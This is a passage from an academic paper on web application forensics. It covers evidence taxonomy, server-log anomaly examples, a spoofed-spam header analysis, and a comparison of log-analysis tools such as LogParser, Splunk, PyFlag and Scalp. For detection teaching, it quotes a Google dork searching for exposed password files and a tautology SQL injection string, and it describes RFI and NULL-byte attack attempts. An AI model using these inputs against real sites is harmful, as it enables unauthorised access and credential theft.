skills, can not be approved as sufficient requirements for proper WAFO deployment.
On the one hand we discover high information abundance, concerning the prior discussed
complexity aspects of RIA Webapps, on the other the impulse for applying appropriate WAFO on
these high-level sophisticated applications is immense.
Once again, this confirms the need for proper taxonomy- not best-practices, presenting a recipe
shaping of the Web Application Forensics investigation, but categorizations, approved to be
universally valid and compact in their representation. Let's conclude the illustration of the Webapp
forensics' categorization and extend the described taxonomic aspects heretofore.
Respecting the post mortem strategies, after intruder's attack is successfully accomplished and
damage is presented, we specify two general approaches for Webapp sanitization- Incident
Response( IR) and Web Application Forensics. In a word, the differences between them, should be
outlined as follows. The remediation scenario, applied to the compromised application and focused
on the regaining of the implementation's complete functionality, is the main concern of the Incident
Response. In distinction to this, the Forensics investigation focuses on gathering the maximum
collection of evidence, which is relevant for the IR utilization and should be employed to a court of
jurisdiction, if required.
Let's demonstrate the complete overview of the Digital Forensics structure and point out the
dependencies between IR and CFO, as well as, the dependencies between WAFO and the other
Forensics fields. This is illustrated in the next Figure 3.

19


Figure 3: Digital Forensics: General taxonomy

For the reader concerned, please refer to [12], where IR and Forensics approaches are compared in
detail. More general representation on the topics IR and Forensics should be found at [1], [13], [14].
In this way of thoughts, we should derive and should specify the following fundamental
questions( *), concerning WAFO:
1. how can we describe an environment as ready for Forensics investigations,
2. what evidence should we look for and
3. what is the definition of their location,
4. how can we extract the payload of the Forensics evidence raw data, concerning its proper
application in the further steps of IR.
Let's designate the general procedure in the implementation of WAFO. The next Figure 4:

20


Figure 4: WAFO phases, in Jess Garcia[1]

This illustrates, respecting the universal validity, the following steps in the WAFO deployment:
• seizure- the problem should be designated,
• Preliminary Analysis- preparation for the specific WAFO investigation,
• Investigation/ Analysis loop- analyzing the collected evidence and proceeding in this
manner till the collection of those is maximal and complete
In this way of thoughts, we should underscore the Standard Tasks, WAFO is utilizing, as in [15]:

1. Understand the “normal” flow 2. Capture application and server
of the application configuration files
3. Review • Web Server 4. Identify • Malicious input from client
log potential • Breaks in normal web
files: anomalies: access trends
• Application • Unusual referrers
Server
• Mid-session changes to
cookie values
• Database Server 5. Determine a remediation plan
• Application

Table 5: Web Application Forensics Overview, in [15]

Let's categorize the evidence, as an argumentation to the second fundamental question, see (2,*), in
Table 6:

21


Digital Forensics evidence:
• Human Testimony • Peripherals
• Environmental • External Storage
• Network traffic • Mobile Devices
• Network Devices • … ANYTHING !
• Host: Operating Systems, Databases, Applications
Table 6: A general Taxonomy of the Forensics evidence, in [1]

To specify the source of the different Forensics evidence, see (3,*), we should clarify the 'Players',
as Jess Garcia in [1], contributing to the Layer 7 communication as follows, see Table 7:

Type of 'Players': … and their Implementation in the Web traffic:
Network Traffic
Common Operating Systems
Client Side ( Web) Browsers
Web Servers
Server Side Application Servers
Database Servers
Table 7: Common Players in Layer 7 Communication, in Jess Garcia [1]

A reasonable WAFO should present an inspection/ analysis of all evidence these 'Players' produce,
which consists of: inspecting the Network traffic logs( inspecting logs of supportive Applications as
NIDS, IDS, IPS), analysis of the hosts OS logs( incl. HIPS, HIDS, Event logs etc.), header and
cookie inspection of the users' Browsers, inspection of the Server logs, belonging to the Web
Application Architecture, cache inspection etc. As we propose in the former Chapter 2, this should
not be a simple task, especially when the Webapp is highly process-driven( e.g. AJAX, Silverlight,
Flash etc.). This should require additional application-flow analysis, which considers an explicit
knowledge, respecting the functional- and data- flow map of the Webapp. The human factor should
not be underestimated in this regard. Finally, there is also the important matter of the legal aspects,
related to the deployment of the WAFO investigation, which the security professional should be
aware of and should maintain during the Web Application Forensics process. We should not discuss
this matter in detail. The interested reader should find more information, concerning this topic at
[16] and also, as already proposed, in [7]. With respect to the forth fundamental question, see (4,*),
focusing on the evidence payload extraction, we should discuss this more detailed in the next
Section 3.1. of this Chapter.
To conclude this discussion, we should consent to argue the leading fundamental question, pointing
out the Forensics readiness concerns, see (1,*).

22


An environment, which is not prepared for Forensics investigation in an appropriate manner:
• application logging is not present or not adequate adjusted,
• no kind of supportive forensic tools are applied to the WAFO environment( IDS/ IPS etc.),
• users are not well trained for Forensics collaboration;
could detain the Web Application Forensics investigation in a way that, the evidence collection is
considerably incomplete and WAFO could not be anted to the environment, at all [1]. That's why,
the matter of Forensics Readiness should be approved as fundamental in the taxonomy of WAFO,
concerning the Preliminary Analysis phase of the Web Application Forensics deployment.
An illustrative example of the Forensics Readiness, should be found in [13], referenced in Appendix
A, Figure 18. As we specified the general taxonomy, respecting WAFO victim environment, let's
proceed with further examples, designating the deployment of different Web Application Forensics
techniques. On one hand, they demonstrate in a more illustrative manner the paper's exposition; on
the other, refer to the reasonable question argumentation on how WAFO payload data is gained
from evidence in practice.

3.1. Examples of Webapp Forensics techniques

In this Section we should describe different cases of WAFO deployment, concerning Client Side
and Server Side forensics analysis, on given real-life examples, organized as follows: main topic,
possible attacks, WAFO techniques illustration.

Extraneous White Space on the Request Line

This example is discussed in [3], which provides evidence for anomalies in HTTP requests, stored
in the Webapp server log. The whitespace between the requesting URL and the protocol should be
considered as suspicious. In the next Figure is illustrated a poorly constructed robot, which
obviously intends to accomplish a remote file inclusion:

Figure 5: Extraneous White Space on Request Line, in [3]

Google Dorks

Exploiting the Google search capabilities, may be illustrated with the next search query [3]:

23


intitle:”Index of” master.passwd
The produced evidence should appear in the server logs as follows:

Figure 6: Google Dorks example, in [3]

The author of the book [3] states, that such requests are still very un-targeted, because of the fact
that such requests are chaotic, in term of, the target is not explicitly specified in the search query.
Nevertheless, they should not be considered underestimated. In respect to this, follows the next
example, produced by spammers, utilizing the Google search engine for the same purpose:

Figure 7: Malicious queries at Google search by spammers, in [3]

Faking a Referring URL
A great21 job for faking Referrer URL22 credentials is done by spammers. In the next example the
faked part of the URL is presented in the anchor identifier, which is unique for accessing different
parts on the displayed web page content. Such GET requests should not be approved as valid log
file entries via clicks on the Web page, because the Web server reproduces the whole Web page and
do not matter explicitly about its content, thus such log entry should be determined as malicious and
, once again to be mentioned, not produced by a regular Web surfing activity:

Figure 8: faked Referrer URL by spammers, in [3]

Remote File Inclusion
A good example for Common Request URL Attacks could be illustrated by the next Remote File
Inclusion( RFI)23 attempt stored in the Web Server log:

Figure 9: RFI, pulling c99 shell, in [3]

The attempt to pull the well known c99 shell on the running machine on behalf of a GET Request is
obvious. The c99 shell is classified as a malicious PHP backdoor. There is a great likelihood that,
Web intruders try to inject and execute such kind of code on Open Source PHP Webapps, like
different PHP-based CMSes, or PHP-forums. In most cases RFIs are deployed to extend the
structure of compromised machines and support the utilization of botnets.

21 'great job' in terms of, discussing the algorithmic approach as security professionals and by no means as favoring the
malicious intentions of the Cyber criminal
22 RFC 1738
23 http://projects.webappsec.org/w/page/13246955/Remote-File-Inclusion

24


Another reason for RFI is the attempt to execute code on compromised machine and gain access to
sensitive data on it.
A simple Classic SQLIA
The following general example illustrates the utilization of SQLIA [4] on a PHP Webapp on behalf
of a malicious GET request:

Figure 10: Simple Classic SQLIA, in [3]

The intruder tries to compromise the 'admin' account on the Webapp, utilizing Tautologies Classic
SQLIA: ' password= ' or 1=1 - - '. To utilize: the apostrophe, the white spaces and the equals sign
ASC II characters, in the GET request, these are substituted as follows: %27, %20 and %3D, via
their URL Encoding representatives.

NULL-Byte-Injection
A NULL-Byte-Injection( NBI)24 could be also accomplished on behalf of a GET Request, as:

Figure 11: NBO evidence in Webapp log, in [3]

In the same manner as in the former example the Null ASC II character is URL encoded here by
%00. The attack tries to compromise the Perl login.cgi -script and utilizing the NBI to open the
sensitive .cgi file.
The provided examples illustrate different header inspection cases as part of the Server Side
Forensics.
This list can be extended by further paradigms, related to user client Browser investigation
techniques: Browser Session-Restore Forensics [17] and Cookie inspection etc. Though, we should
not consider further illustrations of WAFO techniques in this section, with respect to the marginal
boundaries of the term paper. The interested reader should refer to [3] and [15] for more
information. Let's proceed with an example, concerning the WebMail forensics.

3.2. WebMail Forensics

Web based Mail( WebMail) represents a separate construct in an Web Application. Furthermore,
many firms deploy Web based mail services, like: Yahoo, Amazon etc. Moreover, the WebMail
denotes another data input source on a Webapp, therefore, the strive for compromising Web based
Mail implementations still matters. The next Figure 12 illustrates a faked ( spam) e-mail:

24 http://projects.webappsec.org/w/page/13246949/Null-Byte-Injection

25


Figure 12: HTML representation of spam-mail( e-mail spoofing)

This should designate the last case study in the examples exposition. The spam-mail should be
considered as representative of one of the most utilized attacking techniques, concerning WebMail-
e-mail spoofing. We should illustrate according to this a fragment of the mail header, see Figure 13:

Figure 13: e-mail header snippet of the spam-mail in Figure 12

26


Furthermore, a diffrent supportive attacking technique designate the e-mail sniffing, which should
not be discussed in this paper. For the reader concerned, please refer to [18], [19]. The Author of the
paper receives the illustrated spam-mail in January 201125. Let's demonstrate a WebMail header
inspection on the given example, as in Figure 13 already shown, which should explain the e-mail
stuffing attempt. On one hand, inspecting the Received- header the domain appears to be valid and
belongs to facebook.com26; on the other, the Return-Path- header, as well as the X-Envelope-
Sender- header reveal a totally different sender. The domain, specified there, appears to belong to a
home building company in the US. Moreover, there is another domain very similar to the one in the
example: 'cedarhomes.com.au'. Inspecting as next the Sender header, the sender name appears to be
a common name in Australia27. The correlation of the evidence is illustrative. More important, the e-
mail-spoofing attempt is identified.
A different crucial matter also concerns the discussed spam-mail. A more detailed investigation on
the HTML- content of the spam e-mail, provoked by the suspicious appearance of the Hyper-Link
'here', as in Figure 12, the second row from the bottom of the HTML mask: '…, please click here to
unsubscribe.'; reveals the following dangerous HTML-Tag content, see next Figure:

Figure 14: Spam-assassin sanitized malicious HTML redirection, from example Figure 12

It appears to be that, the spam-mail is intelligently devised, as the intruder is not actually interested
only in spamming the e-mail accounts. With greater likelihood, a receiver, who does not use social
platforms, or just dislike to receive such e-mails, should click on the un-subscribing link, which
should lead him to a malicious site. Modern versions of Mozilla Firefox Browser can detect the
compromised and malicious domain 'promelectroncert.kiev.ua' and warn the Browser user right on
time,as appropriate. This interesting example illustrates the argumentation, explaining why should
WebMail Forensics matter.
Thus, we conclude this section and proceed to the last part of this Chapter 3, concerning aspects on
collaborative approaches from the other Forensics investigation fields, supporting WAFO.

3.3. Supportive Forensics

In this section we should discuss briefly the supporting part of Network, Digital Image and (OS)-
Database Forensics, extending the evidence collection for WAFO investigation. The presence of log
data, derived from IDS/IPS prevention systems, supports the more precise detection of the intruders'
activities on the Webapp and IP provenance. The amount of noise over the network, the intruder
produces, is sufficient as described formerly, to determine properly the violator's profile. In some
cases, Forensics investigations on digital images uploaded to a compromised Web Application
should lead to the successful detection of the intruders' origins.
25 At this point,the author of the paper should like to express his gratitude to Rechenzentrum at Ruhr-University of
Bochum, for the successful sanitization of the spam-mail, utilizing spam-assassin right on time,
http://www.rz.ruhr-uni-bochum.de/ , http://spamassassin.apache.org/
26 http://www.mtgsy.net/dns/utilities.php
27 http://search.ancestry.com.au

27


This denotes once again the reasonable suggestion for extensive correlation of the different payload
as forensic evidence, which should reduce false positives appearances in the results and
consequently to this, more precise attacking detection should be achieved.
A very interesting example is pointed out in [3], page 285, concerning the Sharm el Sheikh Case
Study.
At last, we should also mention the notable case, in which WAFO is detained, because of the lack of
sufficient Database log data. Root for such issues could be: the proper utilization of concealing
techniques a Web intruder applies to cover the attacks' traces, malfunction in the Database engine,
lack of proper WAFO Readiness utilization- logging capabilities of the RDBMS are not adequate
adjusted etc. In such cases the WAFO successful examination of compromised RDBMS as a Back-
End to a Webapp is constitutive doubtful. Nevertheless, if the RDBMS Application Server has not
been restarted since the time prior to the moment as the Attacking Scenario is executed, there is a
reasonable chance to extract important forensic evidence from the RDBMS plan cache. This
essential approach is discussed in detail in [16].
We discuss in this Chapter techniques for deployment of WAFO, which should be considered as
manual techniques. If the observed environment is compact and the amount of sufficient evidence,
could be examined by a human in acceptable time and efforts, expanding the collection of such
forensic techniques is undeniably fundamental and relevant.
For all that, there are many cases, concerning modern Webapps, in which the observation of the log
files exceeds the human abilities, like the capacity of logs provided by Web Scanners equal to a
couple of Gigabytes[L8].
Another example is the utilization of WAFO investigation accomplished rapid in time.
In such cases the questions, concerning the utilization of automated tools, enhancing the
deployment of Webapp forensics, become undoubtedly significant.
Let's introduce in the next Chapter 4 such tools, respecting WAFO automation techniques.

28

4.Webapp Forensics tools

4. Webapp Forensics tools

In [13], Jess Garcia proposes a categorization of the Forensics approaches, separating them in two
classes: Traditional forensics methods and Reactive forensics methods. A good illustration of the
main parameters, designating the two classes, is represented in the next Table, derived from [13]:
Traditional Forensics Approaches: Reactive Forensics Approaches:
• Slow • Faster
• Manual • Manual/ Automated
• More accurate( if done properly) • Risk of False Positives/ Negatives
• More forensically Sound • Less forensically Sound( ?)
• Older evidence • Fresher evidence
Table 8: Traditional vs. Reactive forensics Approaches, in [13]

According to the examples in Chapter 3, we should clarify that, the detection of those could be
established only by well trained security professional in acceptable matter of time. Manually
deployed WAFO investigations should be determined as very precise with less false tolerance,
though only if applied appropriate. As mentioned above, the complexity of the current Web
Attacking Scenarios drives the investigation process to be unacceptable, respecting the time aspect.
Business Webapps do not tolerate down-time, which is undoubtedly required that, the Webapp
image should be processed for reasonable WAFO. This designates the dualistic matter of Web
Application Forensics investigation: slow and precise versus faster and error prone.

On one hand WAFO should be deployed uniquely for every single case of compromised Webapp,
on the other the utilization of new techniques, as employment of automated tools in the WAFO
investigation, should gain without a doubt new( 'fresher') forensic evidence. This is very important,
concerning the maximal Forensics evidence collection, as already proposed. In this way of thoughts,
we should explain the fact that, the utilization of new automated techniques in WAFO, is only
acceptable in case of the proper training prior to their implementation in production environment. It
is crucial to know the particular features of the automated tool, which should be utilized; to know
the reactions of the Webapp environment as the tool is implemented to it; to know the level of
transparency, concerning the distance between the raw log files data and the tool's feedback as
evidence payload etc. Let's illustrate some of the fundamental requirements parameters, considering
WAFO automated tools as appropriate for their enforcement in the Forensics investigation process.

4.1. Requirements for Webapp forensics tools

An essential categorization of the requirements for WAFO automated tools is given by Robert
Hansen in [L9]. We should designate them as tool's requirements rules( TRR), as follows:
1. an automated tool candidate for WAFO should be able to parse log files in different formats
2. it should be able to take two independent and differently formatted logs and combine them

29


3. the WAFO tool must be able to normalize by time
4. it should be able to handle big log files in the range of GiB
5. it should allow utilization of regular expressions and binary logic on any observed parameter
in the log file
6. the tool should be able to narrow down to a subset of logical culprits
7. the automated tool should allow implementation of white-lists
8. it should allow a probable culprits' list construction, on which basis the security investigator
should be able to pivot against
9. it should be also able to maintain a list of suspicious requests, which should indicate a
potential compromise
10. the WAFO tool should utilize, decoding of URL data so that, it can be searched easier in
readable formate
As we should experience in the further Sections of the Chapter, we should consent that, the
compliance of the heretofore enumerated requirements is still unfeasible.
Let's represent a short explanation of them, which should define them as an appropriate constitutive
basis.
No matter, if the specific tool imply all of these requirements, or not, this should support a more
appropriate categorization of its skills and utilization area(s). As current Webapps require, with
reasonable likelihood, more than one different Web- Servers( for example), parsing the different log
formats, could be not an easy task. This is a fundamental reason to decide, whether it is more
appropriate to utilize specialized tools, related to the specific log- file format, or to seek further for
an application, with wide variety of supported log- data formats. Two sufficient candidates are:
Microsoft IIS file format and Apache Web server log data format28. In this way of thoughts, the
concern is important, stressing the fact, how to combine the raw data from such concurrent running
different Web- Servers to achieve a better correlation of the evidence, provided by the proper
extraction of the payload from their log data.
Furthermore, to outline coincidences, we should consider proper investigation on time-stamps.
A normalization on time is crucial.
The matter of the current amount of collected log files is discussed enough heretofore and clearly
sufficient.
The aspects, explaining the utilization of Regular Expressions, should be designated as crucial too.
To illustrate this, let's mention the fact, respecting the differences in the implementations of
Regular Expressions on Black- Lists basis and those on White- Lists basis, which employs a further
parameter in the requirements list. The white- listing utilization should concern cases, in which the
traced payload should express a well-defined construction. If the observed input string differs from
this limited form, it should be outlined as suspicious. Example, Regular Expressions( RegEx) for
filtering of tamper data of input fields in Webapp as login-ID from an e-mail type.
On the contrary, the Black- listing specifies, what kind of construct is wrong and suspicions as
default. Such filters could be eluded in a simple manner by altering in an appropriate way of the
injection code, so the RegEx should fail with greater likelihood to detect it properly. It is a very

28 Statistics for the utilization of the different Web- Server should be found at: http://news.netcraft.com/

30


controversial task to define a Black- List RegEx, which is covering a class of malicious strings and
sustain precise('fresh'). Furthermore, it is a challenge to implement a forensics tool with minimal
and compact collection of malicious signature, which should be able to sustain universally valid.
Probability analysis, supporting a right on time detection of malicious signature, is a further
challenging topic.
Moreover, it should be very useful, if the tool is expendable by the forensics investigator, in terms
of the security professional is allowed to refresh and update the list of malicious payload detecting
RegExes manually. In the examples in Section 3.1. and 3.2. the illustration of the importance of
proper URL- Encoding is designated and requires no further discussion on it.
These conclusions advocate the statement that, TRR1 up to TRR 10 are relevant and fundamentally
important for proper WAFO.
Let's present a couple of interesting examples of particular WAFO automated tools candidates in the
next Sections 4.2. and 4.3.. As tools' requirements basis is already specified, we should classify the
tools in general into Open Source and proprietary ones and describe an appropriate tuple of those
accordingly.

4.2. Proprietary tools

As we discuss Business related Webapps as sufficient criterion, we should describe at first the
Business-to-Business implementations of WAFO automated tools. Current representatives in this
class should be enumerated as follows: EnCase[L10], FTK[L11], Microsoft LogParser[L12],
Splunk[L13] etc. According to the WAFO tools requirements the author of the paper deliberates the
following favorites in this category, see further.

Microsoft LogParser

This forensics tool is developed by Gabriele Giuseppini29. A brief history of MS LogParser is given
at [L15],[L16]. The application can be obtained and utilized for free, see [L12], though as [L14]
Microsoft rather designate it as “skunkware” and dislike to give an official support for it. Current
version of the tool is LogParser 2.2, released at 2005. An unofficial Support site, concerning the
tool should be found at: www.logparser.com30.
The parser includes in general the following 3 main units: an input engine, a SQL-like query engine
core and an output engine. A good illustration of the tool's structure is given at [L16], see further
Appendix B, Figure 19. MS LogParser utilizes support for many autonomous input file formats: IIS
log files( Netmon-Capture-logs), Event log files, text files( W3C, CSV, TSV, XML etc.), Windows
Registry databases, SQL Server databases, MS ISA Server log files, MS Exchange log files, SMTP
protocol log files, extended W3C log files( like Firewall log files) etc. Another achievement of the
tool is, it can search for specific files in the observed file system and also search for specific Active
Directory objects. Furthermore, the input engine can combine payload of the different input file
formats, which allows a consolidated parsing and data correlation, thus TRR 1 and TRR 2 are
satisfied. Acceptable input data types are: INTEGER, STRING, TIMESTAMP, REAL, and NULL,

29 http://nl.linkedin.com/in/gabrielegiuseppini
30 Unluckily at the present moment this site seems to be down.

31


which satisfies TRR 3. As [L17] parsing of the input data is achieved in efficient time, which
designates another positive feature of the tool. As the data is supplied to the core engine, the
Forensics examiner is allowed to parse, utilizing SQL-like queries. As default, this is implemented
on behalf of a standard command line console, explicitly explained in [21]. Before illustrating this
via example, let's mention that, there should be unofficial front-ends providing more user-friendly
GUIs, like: simpleLPview0031. However, as the domain logparser.com seems to be down at the
paper's development phase, the author of the paper isn't able to utilize tests on the GUI front-end.
For the reader concerned, the GUI versions of MS LogParser aren't limited to that front-end.
Developers can extend the MS LogParser UI via COM- objects, see [L15], which enables the
Forensics professional to extend the tool's abilities by programming custom input format plug-ins.
Let's illustrate the MS LogParser syntax, see [L15]:
C:Logs>logparser "SELECT * INTO EventLogsTable FROM System" -i:EVT -o:SQL
-database:LogsDatabase -iCheckpoint:MyCheckpoint.lpc

The following example, represents a SQL-like query, where the input file format specified by -i
concerns the MS Event logs; the output format is SQL, which means the results are stored in a
database and could be filtered further as appropriate. An important option is -iCheckpoint, which
designates the ability for setting checkpoint on the log files and thus achieve an incremental parsing,
on the observed log data, which increases the efficiency on parsing large log files and satisfies in
some way the TRR 4. The next example demonstrates, see [L15]:
C:>logparser "SELECT ComputerName, TimeGenerated AS LogonTime,
STRCAT(STRCAT(EXTRACT_TOKEN (Strings, 1, '|'), ''), EXTRACT_TOKEN(Strings, 0, '|'))
AS Username FROM SERVER01 Security WHERE EventID IN (552; 528) AND
EventCategoryName = 'Logon/Logoff'" -i:EVT

a simple string manipulation, which could be extended by RegExes and satisfies TRR 5, 7.
Different interesting paradigms can be found at [15], [L15], [L16], [L17].
Another notable aspect of the MS LogParser is its ability to execute automated tasks. One approach
is to write batch-jobs for the tool and make system scheduler entries for their automated execution,
please consider [L14]. Furthermore, the examiner can utilize windows scripting on MS LogParser,
as [L17]. Appendix B, Figure 20 illustrates this. The standard implementation scenario is given as
follows, see [L17]:
• register the LogParser.dll
• create the Logparser object
• define and configure the Input format object
• define and configure the Output format object
• specify the LogParser query
• execute the query and obtain the payload
This briefly introduction of the MS LogParser demonstrates its mightiness without a doubt.
However, we should consider the tool as appropriate only concerning MS Windows based
31 http://www.logparser.com/simpleLPview00.zip

32


environments, such as .asp, .aspx, .mspx Web applications.
An open question remains, regarding the proper examination of Silverlight implementations.
Another possible issue could be the iCheckpoint, configuring the incremental parsing jobs. Locating
the .lpc configuration file(s) could easily lead the intruder to the log files, related to the forensics
jobs, which should be exploited straight ahead.

Splunk

This tool is developed and maintained by Splunk Inc32. It's current stable release is 4.2.2, 2011.
Although the professional version of the tool is high priced, there is a test version for the limited
time of 30 days and a bounded amount of parsed log files up to 500 MB. The test version can be
employed for free. Furthermore, there is a community support, concerning Splunk as a mailing list
and Community Wikipedia, hosted on the Splunk Inc. domain. Official support regarding Splunk
documentation, version releases and FAQ/ Case studies is presented at the tool's website, which
require a free registration.
Another advantage of Splunk is the on-the-fly Official-/Community-IRC-Support. Next interesting
feature is the users' and official professionals' uploaded Video-tutorials, demonstrating specific
usage scenarios and case studies.
The tool has wide OS support: Windows, Linux, Solaris, Mac OS, FreeBSD, AIX and HP-UX.
Splunk can be considered as a highly hardware consuming application33. It was tested on an Intel
Pentium T7700 with 3GB of RAM machine under Windows XP Professional SP3 and Ubuntu
Linux 10.04 Lucid Lynx. In both of the cases the setup runs flawlessly with less additional
installation effort on the user's side. After successful installation Splunk registers a new user on the
host OS, which can be deactivated. The tool represents a python based application. It antes a Web
server, an OpenSSL server and an OpenLDAP, which interact with the different parsers for input
data. The configuration of the different Splunk elements is implemented via XML, which allows
them to be userfriendly adjusted. Splunk has even greater input format support than MS LogParser,
which designates the tool as not only OS independent, but also input format all-round. An
interesting combination of Splunk with Nagios is discussed at [L18]. A screenshot of the official
deliberated features of the tool is illustrated at Appendix B, Figure 21. These aspects relate to the
TRR 1, 2, 3, 4, 5. TRR 7, 9, 10 should be tested more extensive in particular.
The user interaction with Splunk is utilized via common Web-browser. The different Splunk
elements are organized on a dashboard, which allows to be reordered and organized in an user-
friendly manner.
Let's represent more detailed the main Splunk units. Their description is based on [L19], which
concerns Splunk version 3.2.6. Although after ver. 4.0 Splunk is completely rewritten, the main
Business logic units sustain.
In general, the idea behind this tool is not only to parse different log file formats and support
different network protocols, but also to index the parsed data. Thus, the tool impersonates a
valuable search engine, like those largely known nowadays on the Internet. This allows the user to
accomplish more userfriendly and precise searches on specific criterion. Indeed, the query
responses from the tail- dashboard are significantly fast. Intuitively, we designate the first Splunk
32 http://www.splunk.com/
33 http://www.splunk.com/base/Documentation/latest/installation/SystemRequirements

33


unit- the index engine. It supports SNMP and syslog as well. Consequently to this, the second unit
represents the search core engine. One can include different search operators on specific criterion
like Boolean, nested, quoted, wildcards, which respects as already stated TRR 5 and 7. The third
unit is the alert engine, which somehow satisfies TRR 9. The notifications can be sent via RSS,
email, SNMP, or even particular Web hyperlinks. In addition to this, the fourth unit implements the
reporting ability of Splunk, TRR 2 and 3. On a specific prepared dashboard the user/ forensic
examiner can not only gain detailed results on the parsed payload in text formate, but also gain
derived information as interactive charts and graphs, and specific formated tables according to the
auditing jobs. These are well illustrated in Appendix B, Figure 22. An interesting example describes
the reporting abilities of Splunk to detect JavaScript onerror entries, on behalf of user-developed
json- script, see [L22].
The fifth and last unit represents the sharing engine/ feature of Splunk. This explains the strive for
users' collaborative work on behalf of this tool, where as know-how exchange is encouraged.
Another motivation for this unit is a distributed Splunk environment, where not only single instance
of Splunk is serving the specific network. Further abilities of the forensic tool should be mentioned
as: scaling the observed network and security of the parsed data.
This last feature is important to be discussed more detailed. An open question remains, as denoted at
MS LogParser, whether the tool is hardened enough on itself, considering the fact that, the large
payload data it is not only indexed, but also userfriendly represented. As Splunk is without a doubt
an interface to every log file and protocol on the observed network, it is highly likable to get this
bonding point compromised. If an attacker succeeds in this matter, one can get every detail, related
to the observed network represented in an userfriendly format, which disburdens the intruder to
collect valuable payload data and minimizes his/ hers penetration efforts. As the Splunk front-end is
represented via Web-browser, intuitively the reader concerned, can notice that,
CSRF [4] and CSFU [L20] could be respectable candidates for such attacking scenarios, especially
combined with DOM based XSS attacks [20], [L21], which can trigger the malicious events in the
Browser engine. If such scenarios could be achieved, then Splunk could alter into a favorite jump-
start platform for exploiting secured networks, instead of to be utilized as appropriate forensic
investigation tool. This designates an essential aspect, concerning the future work on WAFO. We
should not extend this discussion further as it goes beyond the boundaries of the present paper.
Let's introduce the selected Open Source WAFO tools, as mentioned above.

4.3. Open Source tools

At first let's describe PyFlag.

PyFlag

As at the previously described tool, there is a team behind the PyFlag development: Dr. Michael
Cohen, David Collett, Gavin Jackson. The tool's name represents an abbreviation of: python based
Forensic and Log Analysis GUI. PyFlag is another python implementation of forensic investigation
tools, which utilizes as a Front-end for the user the common Web-browser. Current version of the

34


tool is pyflag-0.87-pre1, 2008. The tool is hosted at SourceForge34 and as an Open Source App it
can be obtained for free under the GPL. A support site is considered to be www.pyflag.net. This
domain also stores the PyFlag Wiki with presentations of the tool and video tutorials. A different
advantage is the predefined for examination forensics image also hosted on the support site. This
image can be employed for the purposes of training on forensic investigation.
The general structure of the tool can be described as follows. The python App antes a Web Server
for displaying the parsing output and further, the collected input data is stored in a MySQL server,
which allows the tool to operate with large amount of log files code lines, respecting TRR 4. The IO
Source engine designates the interface to the forensic images, which enable the tool to operate with
large scale input file types, as Splunk.
As the observed image is loaded by the Loader engine in the Virtual File System, different scanners
can be utilized for gaining the forensic relevant payload from the raw data. For the reader
concerned, please refer to [L26]. The main PyFlag data flow is illustrated in the next Figure 15:

Figure 15: Main PyFlag data flow, as [L26]

PyFlag is natively written to support Unix-like OSes. A Windows based port is currently presented
on the support Web site, PyFlagWindows35. This makes the tool OS independent as well. The
PyFlag developers state that, the tool is not only a forensic investigation tool, but rather a rich
development framework. The tool can be used in two modes: either as a python shell, called
PyFlash, or as a userfriendly Web-GUI. The installation process requires some user input; more
detailed, common installation routines like: unpacking the archive to a destination on the host OS,
configuring the source via ./configure on Linux systems, checking for dependency issues and
utilizing the make install, are demanded.
The first start of the tool requires from the forensics investigator to configure the MySQL
administrative account and the Upload directory. This location is crucial for the forensics images,
which should be observed. In general PyFlag represents: a Web Application forensic tool( log
files) , Network forensic tool( capture images via pcap) and an OS forensic investigation tool. As
we denoted in the introduction of the paper, we should only concentrate on the log files analysis by
PyFlag, discerning its other features considering NFO and OSFO( Operating System Forensics).
The authors of the tool encourage the forensics investigators to correlate the different evidence from
WAFO, NFO and OSFO, as it was proposed already before.

34 http://sourceforge.net/
35 http://www.pyflag.net/cgi-bin/moin.cgi/PyFlagWindows

35


More detailed, PyFlag supports variety of different and independent input file formats like: IIS log
format, Apache log files, iptables and syslog formats, respecting TRR 1, 2 and 3. The tool supports
also different kind of level of the formats customization, e.g. Apache logs can be formatted by
default, or customized by the security professional.
Let's explain this. After the installation is completely set up, the user can work with the Browser-
Gui PyFlag environment. For analyzing a specific log file, PyFlag presents presets, which are
templates, allowing to parse a collection of a specific class log files, e.g. IIS log file format. The
preset controls the driver for parsing the specific log as appropriate. As standard routine for an IIS
log file analysis set up is described in [22], as follows:
• Select “create Log Preset” from the PyFlag “Log Analysis”- Menu
• Select the “pyflag_iis_standard_log” file to test the preset against
• Select “IIS” as the log driver and utilize the parsing
A more extensive introduction to the WAFO utilization of the tool is presented at Linux.conf.au,
2008, please consider watching the presentation video [L23]. After the tool starts to collect payload
data from the input source, the Forensics investigator can either employ pre-defined queries and
thus minimize the parsing time on-the-fly, or wait for complete data collection. The data noise in the
obtained collection could be also reduced via white-listing, as TRR 7. Moreover, after data is
collected, the examiner can apply index searching via natural language like queries, comparatively
to Splunk. These features explain the efficient searching by the PyFlag. Another interesting aspect
of the tool is the implementation of GeoIP36( Apache). It can be either obtained from the Debian
repository, which presents a smaller GeoIP collection, or downloaded from the GeoIP website as a
complete collection. GeoIP allows to parse the IPs and Timestamps and correlate them to the origin
location of the GET/POST requests in the log file. This respects TRR 3. The tool can also store the
collected evidence payload in output formats like .cvs, which explains its utilization as a Front-end
to other tools applied to the investigation. An illustration of the PyFlag Web-GUI is given at
Appendix B, Figure 23. To conclude the tool's description, we should mention once more time the
open question of possible compromising of the Web-GUI as explained at the Splunk representation.
A well known attack concerning HTTP Pollution on ModSecurity37 is presented by Luca Carettoni38
in 2009, where the IDS is exploited by an XSS instead of utilizing an image upload to the system.
As mentioned above this advocates the fact that, the tool should be revised for such kind of exploits
and especially rechecked for possible DOM based XSS exploits, concerning its own source.

Apache-scalp or Scalp!

This tool should be considered as explicitly WAFO investigation tool. Scalp! is developed by
Romain Gaucher and the project is hosted on code.google.com. Its current version is 0.4 rev. 28,
2008. The tool is the only one of the described above, which definitely deploys RegExes. It
represents a python script, which can be run in the python console on the common OSes and makes
it OS independent. The tool is published under the Apache License 2.0 and is specified for parsing
especially Apache log files, which denotes its usability only on the class of these log files and does
not respect TRR 1 and 2. It is tested only on a couple of MiB log files, which disrespects further

36 http://www.maxmind.com/app/mod_geoip
37 http://www.modsecurity.org/
38 http://www.linkedin.com/in/lucacarettoni

36

Web Application Forensics: Taxonomy and Trends

Web Application Forensics: Taxonomy and Trends

Recomendados

Recomendados

Más contenido relacionado

La actualidad más candente

La actualidad más candente (20)

Similar a Web Application Forensics: Taxonomy and Trends

Similar a Web Application Forensics: Taxonomy and Trends (20)

Más de Krassen Deltchev

Más de Krassen Deltchev (8)

Último

Último (20)

Web Application Forensics: Taxonomy and Trends